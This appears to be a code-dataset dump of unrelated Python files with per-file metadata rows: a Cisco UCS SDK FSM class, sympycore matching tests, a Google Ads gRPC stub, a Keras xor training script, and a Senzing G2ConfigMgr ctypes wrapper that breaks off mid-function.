"rmt_err_code": MoPropertyMeta("rmt_err_code", "rmtErrCode", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["ERR-2fa-auth-retry", "ERR-ACTIVATE-failed", "ERR-ACTIVATE-in-progress", "ERR-ACTIVATE-retry", "ERR-BIOS-TOKENS-OLD-BIOS", "ERR-BIOS-TOKENS-OLD-CIMC", "ERR-BIOS-network-boot-order-not-found", "ERR-BOARDCTRLUPDATE-ignore", "ERR-DIAG-cancelled", "ERR-DIAG-fsm-restarted", "ERR-DIAG-test-failed", "ERR-DNLD-authentication-failure", "ERR-DNLD-hostkey-mismatch", "ERR-DNLD-invalid-image", "ERR-DNLD-no-file", "ERR-DNLD-no-space", "ERR-DNLD-usb-unmounted", "ERR-DNS-delete-error", "ERR-DNS-get-error", "ERR-DNS-set-error", "ERR-Diagnostics-in-progress", "ERR-Diagnostics-memtest-in-progress", "ERR-Diagnostics-network-in-progress", "ERR-FILTER-illegal-format", "ERR-FSM-no-such-state", "ERR-HOST-fru-identity-mismatch", "ERR-HTTP-set-error", "ERR-HTTPS-set-error", "ERR-IBMC-analyze-results", "ERR-IBMC-connect-error", "ERR-IBMC-connector-info-retrieval-error", "ERR-IBMC-fru-retrieval-error", "ERR-IBMC-invalid-end-point-config", "ERR-IBMC-results-not-ready", "ERR-MAX-subscriptions-allowed-error", "ERR-MO-CONFIG-child-object-cant-be-configured", "ERR-MO-META-no-such-object-class", "ERR-MO-PROPERTY-no-such-property", "ERR-MO-PROPERTY-value-out-of-range", "ERR-MO-access-denied", "ERR-MO-deletion-rule-violation", "ERR-MO-duplicate-object", "ERR-MO-illegal-containment", "ERR-MO-illegal-creation", "ERR-MO-illegal-iterator-state", "ERR-MO-illegal-object-lifecycle-transition", "ERR-MO-naming-rule-violation", "ERR-MO-object-not-found", "ERR-MO-resource-allocation", "ERR-NTP-delete-error", "ERR-NTP-get-error", "ERR-NTP-set-error", "ERR-POWER-CAP-UNSUPPORTED", "ERR-POWER-PROFILE-IN-PROGRESS", "ERR-SERVER-mis-connect", "ERR-SWITCH-invalid-if-config", "ERR-TOKEN-request-denied", "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS", "ERR-UPDATE-failed", "ERR-UPDATE-in-progress", "ERR-UPDATE-retry", "ERR-aaa-config-modify-error", "ERR-acct-realm-set-error", "ERR-admin-passwd-set", "ERR-auth-issue", "ERR-auth-realm-get-error", "ERR-auth-realm-set-error", "ERR-authentication", "ERR-authorization-required", "ERR-cli-session-limit-reached", "ERR-create-keyring", "ERR-create-locale", "ERR-create-role", "ERR-create-tp", "ERR-create-user", "ERR-delete-locale", "ERR-delete-role", "ERR-delete-session", "ERR-delete-user", "ERR-downgrade-fail", "ERR-efi-Diagnostics--in-progress", "ERR-enable-mgmt-conn", "ERR-ep-set-error", "ERR-get-max-http-user-sessions", "ERR-http-initializing", "ERR-insufficiently-equipped", "ERR-internal-error", "ERR-ldap-delete-error", "ERR-ldap-get-error", "ERR-ldap-group-modify-error", "ERR-ldap-group-set-error", "ERR-ldap-set-error", "ERR-locale-set-error", "ERR-max-userid-sessions-reached", "ERR-missing-method", "ERR-modify-locale", "ERR-modify-role", "ERR-modify-user", "ERR-modify-user-locale", "ERR-modify-user-role", "ERR-provider-group-modify-error", "ERR-provider-group-set-error", "ERR-radius-get-error", "ERR-radius-global-set-error", "ERR-radius-group-set-error", "ERR-radius-set-error", "ERR-request-timeout", "ERR-reset-adapter", "ERR-role-set-error", "ERR-secondary-node", "ERR-service-not-ready", "ERR-session-cache-full", "ERR-session-not-found", "ERR-set-key-cert", "ERR-set-login-profile", "ERR-set-min-passphrase-length", "ERR-set-network", "ERR-set-password-strength-check", "ERR-set-port-channel", "ERR-store-pre-login-banner-msg", "ERR-tacacs-enable-error", "ERR-tacacs-global-set-error", "ERR-tacacs-group-set-error", "ERR-tacacs-plus-get-error", "ERR-tacacs-set-error", 
"ERR-test-error-1", "ERR-test-error-2", "ERR-timezone-set-error", "ERR-user-account-expired", "ERR-user-passwd-expired", "ERR-user-set-error", "ERR-xml-parse-error", "none"], ["0-4294967295"]),
"rmt_err_descr": MoPropertyMeta("rmt_err_descr", "rmtErrDescr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rmt_rslt": MoPropertyMeta("rmt_rslt", "rmtRslt", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout),){0,32}(defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout){0,1}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"completionTime": "completion_time",
"currentFsm": "current_fsm",
"descr": "descr",
"dn": "dn",
"fsmStatus": "fsm_status",
"instanceId": "instance_id",
"progress": "progress",
"rmtErrCode": "rmt_err_code",
"rmtErrDescr": "rmt_err_descr",
"rmtRslt": "rmt_rslt",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.completion_time = None
self.current_fsm = None
self.descr = None
self.fsm_status = None
self.instance_id = None
self.progress = None
self.rmt_err_code = None
self.rmt_err_descr = None
self.rmt_rslt = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "IdentMetaSystemFsm", parent_mo_or_dn, **kwargs)
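# Illustrative usage sketch for the read-only FSM object above.  The import
# path, login/query calls, endpoint and credentials are assumptions for
# illustration only and are not part of the generated SDK file.
if __name__ == "__main__":
    from ucsmsdk.ucshandle import UcsHandle  # assumed import path
    handle = UcsHandle("192.0.2.10", "admin", "password")  # hypothetical endpoint
    handle.login()
    # IdentMetaSystemFsm is marked "OutputOnly" above, so it is only ever read back:
    for fsm in handle.query_classid("identMetaSystemFsm"):
        print(fsm.dn, fsm.current_fsm, fsm.fsm_status, fsm.progress)
    handle.logout()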
| ucsmsdk/mometa/ident/IdentMetaSystemFsm.py | 18,680 | This is IdentMetaSystemFsm class.
This module contains the general information for IdentMetaSystemFsm ManagedObject. | 116 | en | 0.392342 |
from sympycore import CollectingField as Algebra
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
p = Symbol('p')
s = Symbol('s')
t = Symbol('t')
assert s.matches(s)=={}
assert s.matches(t)==None
assert s.matches(t,{},([s,],[True,]))=={s:t}
assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
s = Symbol('s')
n = Number(2)
assert n.matches(2)=={}
assert n.matches(3)==None
assert n.matches(s)==None
assert n.matches(s+2)==None
def test_wild():
w = Symbol('w')
s = Symbol('s')
wargs = [w],[True]
assert w.matches(Number(2),{},wargs)=={w:2}
assert w.matches(s,{},wargs)=={w:s}
assert w.matches(w,{},wargs)==None
assert w.matches(s+2,{},wargs)=={w:s+2}
assert w.matches(2*s,{},wargs)=={w:2*s}
assert w.matches(s**2,{},wargs)=={w:s**2}
def test_symbol_plain():
s = Symbol('s')
assert s.matches(s)=={}
assert s.matches(2)==None
assert s.matches(2+s)==None
assert s.matches(2*s)==None
assert s.matches(s**2)==None
def test_term():
s = Symbol('s')
p = 2*s
assert p.matches(2*s)=={}
assert p.matches(3*s)==None
assert p.matches(s)==None
assert p.matches(Number(2))==None
assert p.matches(s**2)==None
def _test_wild_term():
w = Symbol('w')
p = 2*w
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
assert p.matches(Number(2),*wargs)=={w:1}
assert p.matches(2*s,*wargs)=={w:s}
assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
assert p.matches(t*s,*wargs)=={w:t*s/2}
assert p.matches(s**2,*wargs)=={w:s**2/2}
m = p.matches(2*s+2,*wargs)
assert m is not None and m[w]==(2*(s+1))/2
assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s+w
wargs = {},([w],[True])
assert p.matches(s+2,*wargs)=={w:2}
assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
w1 = Symbol('w1')
w2 = Symbol('w2')
p = w1 + 2*w2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w1,w2],[True,True])
assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
{w1:2+2*s, w2:t/2}]
def _test_wild_factor():
w = Symbol('w')
p = w**2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
#assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}
#assert p.matches(Number(4),*wargs)=={w:2}
#assert p.matches(Number(16),*wargs)=={w:4}
#assert p.matches(Number(9),*wargs)=={w:3}
#assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}
assert p.matches(s,*wargs)==None
assert p.matches(s**2,*wargs)=={w:s}
assert p.matches(s**3,*wargs)==None
#assert p.matches(s**4,*wargs)=={w:s**2}
assert p.matches(s+2,*wargs)==None
assert p.matches(s*2,*wargs)==None
assert p.matches(s**2*2,*wargs)==None
#assert p.matches(s**2*4,*wargs)=={w:2*s}
#assert p.matches(s**2*t**2,*wargs)=={w:s*t}
#assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}
#assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}
#assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}
assert p.matches(s**2*t**3,*wargs)==None
#assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2}
def _test_wild_symbol_factor():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s*w
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:1/s}
assert p.matches(s,*wargs)=={w:1}
assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
x = Symbol('x')
a,b,c,p,q = map(Symbol, 'abcpq')
e = x
assert e.match(x) == {}
assert e.match(a,a) == {a: x}
e = Number(5)
assert e.match(c,c) == {c: 5}
assert e.match(e) == {}
assert e.match(e+1) == None
def _test_add():
x,y,a,b,c = map(Symbol, 'xyabc')
p,q,r = map(Symbol, 'pqr')
e = a+b
assert e.match(p+b,p) == {p: a}
assert e.match(p+a,p) == {p: b}
e = 1+b
assert e.match(p+b,p) == {p: 1}
e = a+b+c
assert e.match(a+p+c,p) == {p: b}
assert e.match(b+p+c,p) == {p: a}
e = a+b+c+x
assert e.match(a+p+x+c,p) == {p: b}
assert e.match(b+p+c+x,p) == {p: a}
assert e.match(b) == None
assert e.match(b+p,p) == {p: a+c+x}
assert e.match(a+p+c,p) == {p: b+x}
assert e.match(b+p+c,p) == {p: a+x}
e = 4*x+5
assert e.match(3*x+p,p) == {p: x+5}
assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
e = 4*x+5*y+6
assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
(q,lambda expr: not expr.args),
(r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| sympycore/basealgebra/tests/test_matches.py | 5,297 | assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}assert p.matches(Number(4),*wargs)=={w:2}assert p.matches(Number(16),*wargs)=={w:4}assert p.matches(Number(9),*wargs)=={w:3}assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}assert p.matches(s**4,*wargs)=={w:s**2}assert p.matches(s**2*4,*wargs)=={w:2*s}assert p.matches(s**2*t**2,*wargs)=={w:s*t}assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2} | 565 | en | 0.178272 |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v2.proto.resources import feed_item_target_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2
from google.ads.google_ads.v2.proto.services import feed_item_target_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2
class FeedItemTargetServiceStub(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetFeedItemTarget = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/GetFeedItemTarget',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.FromString,
)
self.MutateFeedItemTargets = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/MutateFeedItemTargets',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.FromString,
)
class FeedItemTargetServiceServicer(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def GetFeedItemTarget(self, request, context):
"""Returns the requested feed item targets in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateFeedItemTargets(self, request, context):
"""Creates or removes feed item targets. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_FeedItemTargetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetFeedItemTarget': grpc.unary_unary_rpc_method_handler(
servicer.GetFeedItemTarget,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.SerializeToString,
),
'MutateFeedItemTargets': grpc.unary_unary_rpc_method_handler(
servicer.MutateFeedItemTargets,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.FeedItemTargetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
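# Illustrative client-side sketch for the stub above.  The endpoint and the
# resource name are placeholders; a real Google Ads call additionally needs
# OAuth2 channel credentials and a developer-token metadata header, which are
# omitted here.
if __name__ == '__main__':
  channel = grpc.insecure_channel('localhost:50051')  # hypothetical endpoint
  stub = FeedItemTargetServiceStub(channel)
  request = google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest(
      resource_name='customers/1234567890/feedItemTargets/1~2~3~4')  # hypothetical resource name
  print(stub.GetFeedItemTarget(request))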
| google/ads/google_ads/v2/proto/services/feed_item_target_service_pb2_grpc.py | 3,507 | Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
Returns the requested feed item targets in full detail.
Creates or removes feed item targets. Operation statuses are returned.
Constructor.
Args:
channel: A grpc.Channel.
Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! | 429 | en | 0.790636 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Default module to train a xor classifier and write weights to disk."""
from keras.models import Sequential
from keras.layers.core import Dense, Activation
import keras.optimizers as kop
import numpy as np
import os
from sklearn.preprocessing import StandardScaler
try:
import cPickle as pickle
except Exception as ex:
import pickle
def check_dir_exists(dirname='./pickles'):
"""Check if given dirname exists This will contain all the pickle files."""
if not os.path.exists(dirname):
print("Directory to store pickes does not exist. Creating one now: ./pickles")
os.mkdir(dirname)
def save_x_y_scalar(X_train, Y_train):
"""Use a normalization method on your current dataset and save the coefficients.
Args:
X_train: Input X_train
        Y_train: Labels Y_train
Returns:
Normalized X_train,Y_train ( currently using StandardScaler from scikit-learn)
"""
scalar_x = StandardScaler()
X_train = scalar_x.fit_transform(X_train)
scalar_y = StandardScaler()
Y_train = scalar_y.fit_transform(Y_train)
print('dumping StandardScaler objects ..')
pickle.dump(scalar_y,
open('pickles/scalar_y.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(scalar_x,
open('pickles/scalar_x.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
return X_train, Y_train
def create_model(X_train, Y_train):
"""create_model will create a very simple neural net model and save the weights in a predefined directory.
Args:
X_train: Input X_train
        Y_train: Labels Y_train
"""
xin = X_train.shape[1]
model = Sequential()
model.add(Dense(units=4, input_shape=(xin, )))
model.add(Activation('tanh'))
model.add(Dense(4))
model.add(Activation('linear'))
model.add(Dense(1))
rms = kop.RMSprop()
print('compiling now..')
model.compile(loss='mse', optimizer=rms)
model.fit(X_train, Y_train, epochs=1000, batch_size=1, verbose=2)
score = model.evaluate(X_train, Y_train, batch_size=1)
print("Evaluation results:", score)
open('pickles/my_model_architecture.json', 'w').write(model.to_json())
print("Saving weights in: ./pickles/my_model_weights.h5")
model.save_weights('pickles/my_model_weights.h5')
if __name__ == '__main__':
X_train = np.array([[1., 1.], [1., 0], [0, 1.], [0, 0]])
Y_train = np.array([[0.], [1.], [1.], [0.]])
check_dir_exists(dirname='./pickles')
X_train, Y_train = save_x_y_scalar(X_train, Y_train)
create_model(X_train, Y_train)
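# Illustrative inverse of the steps above: reload the saved architecture,
# weights and scalers and run a prediction.  Assumes the pickles/ directory
# written by this script exists; predict_xor is a hypothetical helper name.
def predict_xor(X):
    """Load the saved xor model plus scalers and return de-normalized predictions."""
    from keras.models import model_from_json
    model = model_from_json(open('pickles/my_model_architecture.json').read())
    model.load_weights('pickles/my_model_weights.h5')
    scalar_x = pickle.load(open('pickles/scalar_x.pickle', 'rb'))
    scalar_y = pickle.load(open('pickles/scalar_y.pickle', 'rb'))
    # Apply the training-time normalization, then undo it on the output.
    return scalar_y.inverse_transform(model.predict(scalar_x.transform(X)))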
| createpickles.py | 2,671 | Check if given dirname exists This will contain all the pickle files.
create_model will create a very simple neural net model and save the weights in a predefined directory.
Args:
X_train: Input X_train
Y_train: Lables Y_train
Use a normalization method on your current dataset and save the coefficients.
Args:
X_train: Input X_train
Y_train: Lables Y_train
Returns:
Normalized X_train,Y_train ( currently using StandardScaler from scikit-learn)
Default module to train a xor classifier and write weights to disk.
!/usr/bin/env python -*- coding: utf-8 -*- | 593 | en | 0.718868 |
from ctypes import *
import threading
import json
import os
import arcpy
class MyBuffer(threading.local):
def __init__(self):
self.buf = create_string_buffer(65535)
self.bufSize = sizeof(self.buf)
#arcpy.AddMessage("Created new Buffer {}".format(self.buf))
tls_var = MyBuffer()
from .G2Exception import TranslateG2ModuleException, G2ModuleNotInitialized, G2ModuleGenericException
def resize_return_buffer(buf_, size_):
""" callback function that resizes return buffer when it is too small
Args:
size_: size the return buffer needs to be
"""
try:
if not tls_var.buf:
#arcpy.AddMessage("New RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
elif (tls_var.bufSize < size_):
#arcpy.AddMessage("RESIZE_RETURN_BUF {}:{}/{}".format(buf_,size_,tls_var.bufSize))
foo = tls_var.buf
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
memmove(tls_var.buf, foo, sizeof(foo))
except AttributeError:
#arcpy.AddMessage("AttributeError RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
#arcpy.AddMessage("Created new Buffer {}".format(tls_var.buf))
tls_var.bufSize = size_
return addressof(tls_var.buf)
class G2ConfigMgr(object):
"""G2 config-manager module access library
Attributes:
        _lib_handle: handle to the loaded native G2 library
        _resize_func_def: resize function definition
_resize_func: resize function pointer
_module_name: CME module name
_ini_params: a JSON string containing INI parameters
"""
def initV2(self, module_name_, ini_params_, debug_=False):
""" Initializes the G2 config manager
This should only be called once per process.
Args:
moduleName: A short name given to this instance of the config module
iniParams: A json document that contains G2 system parameters.
        verboseLogging: Enable diagnostic logging, which emits a large amount of information via arcpy.AddMessage
"""
self._module_name = self.prepareStringArgument(module_name_)
self._ini_params = self.prepareStringArgument(ini_params_)
self._debug = debug_
if self._debug:
arcpy.AddMessage("Initializing G2 Config Manager")
self._lib_handle.G2ConfigMgr_init_V2.argtypes = [c_char_p, c_char_p, c_int]
ret_code = self._lib_handle.G2ConfigMgr_init_V2(self._module_name,
self._ini_params,
self._debug)
if self._debug:
arcpy.AddMessage("Initialization Status: " + str(ret_code))
if ret_code == -1:
            raise G2ModuleNotInitialized('G2ConfigMgr has not been successfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def __init__(self):
# type: () -> None
""" Class initialization
"""
try:
if os.name == 'nt':
self._lib_handle = cdll.LoadLibrary("G2.dll")
else:
self._lib_handle = cdll.LoadLibrary("libG2.so")
except OSError as ex:
arcpy.AddMessage("ERROR: Unable to load G2. Did you remember to setup your environment by sourcing the setupEnv file?")
arcpy.AddMessage("ERROR: For more information see https://senzing.zendesk.com/hc/en-us/articles/115002408867-Introduction-G2-Quickstart")
arcpy.AddMessage("ERROR: If you are running Ubuntu or Debian please also review the ssl and crypto information at https://senzing.zendesk.com/hc/en-us/articles/115010259947-System-Requirements")
raise G2ModuleGenericException("Failed to load the G2 library")
self._resize_func_def = CFUNCTYPE(c_char_p, c_char_p, c_size_t)
self._resize_func = self._resize_func_def(resize_return_buffer)
def prepareStringArgument(self, stringToPrepare):
# type: (str) -> str
""" Internal processing function """
#handle null string
if stringToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(stringToPrepare) == str:
return stringToPrepare.encode('utf-8')
        #if input is bytearray, assume utf-8 and convert to str
elif type(stringToPrepare) == bytearray:
return stringToPrepare.decode().encode('utf-8')
elif type(stringToPrepare) == bytes:
            return stringToPrepare
#input is already a str
return stringToPrepare
def prepareIntArgument(self, valueToPrepare):
# type: (str) -> int
""" Internal processing function """
""" This converts many types of values to an integer """
#handle null string
if valueToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(valueToPrepare) == str:
return int(valueToPrepare.encode('utf-8'))
        #if input is bytearray, assume utf-8 and convert to str
elif type(valueToPrepare) == bytearray:
return int(valueToPrepare)
elif type(valueToPrepare) == bytes:
return int(valueToPrepare)
#input is already an int
return valueToPrepare
def addConfig(self, configStr, configComments, configID):
""" registers a new configuration document in the datastore
"""
_configStr = self.prepareStringArgument(configStr)
_configComments = self.prepareStringArgument(configComments)
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_addConfig.argtypes = [c_char_p, c_char_p, POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_addConfig.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_addConfig(_configStr,_configComments,cID)
if ret_code == -1:
            raise G2ModuleNotInitialized('G2ConfigMgr has not been successfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
configID += (str(cID.value).encode())
def getConfig(self,configID,response):
""" retrieves the registered configuration document from the datastore
"""
configID_ = self.prepareIntArgument(configID)
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfig.restype = c_int
self._lib_handle.G2ConfigMgr_getConfig.argtypes = [c_longlong, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfig(configID_,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
            raise G2ModuleNotInitialized('G2ConfigMgr has not been successfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def getConfigList(self,response):
""" retrieves a list of known configurations from the datastore
"""
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfigList.restype = c_int
self._lib_handle.G2ConfigMgr_getConfigList.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfigList(
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
            raise G2ModuleNotInitialized('G2ConfigMgr has not been successfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def setDefaultConfigID(self,configID):
""" sets the default config identifier in the datastore
"""
configID_ = self.prepareIntArgument(configID)
self._lib_handle.G2ConfigMgr_setDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_setDefaultConfigID.argtypes = [c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_setDefaultConfigID(configID_)
if ret_code == -1:
            raise G2ModuleNotInitialized('G2ConfigMgr has not been successfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def replaceDefaultConfigID(self,oldConfigID,newConfigID):
""" sets the default config identifier in the datastore
"""
oldConfigID_ = self.prepareIntArgument(oldConfigID)
newConfigID_ = self.prepareIntArgument(newConfigID)
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.argtypes = [c_longlong,c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_replaceDefaultConfigID(oldConfigID_,newConfigID_)
if ret_code == -1:
            raise G2ModuleNotInitialized('G2ConfigMgr has not been successfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def getDefaultConfigID(self, configID):
""" gets the default config identifier from the datastore
"""
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_getDefaultConfigID.argtypes = [POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_getDefaultConfigID.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_getDefaultConfigID(cID)
if ret_code == -1:
            raise G2ModuleNotInitialized('G2ConfigMgr has not been successfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
if cID.value:
configID += (str(cID.value).encode())
def clearLastException(self):
""" Clears the last exception
"""
self._lib_handle.G2ConfigMgr_clearLastException.restype = None
self._lib_handle.G2ConfigMgr_clearLastException.argtypes = []
self._lib_handle.G2ConfigMgr_clearLastException()
def getLastException(self):
""" Gets the last exception
"""
self._lib_handle.G2ConfigMgr_getLastException.restype = c_int
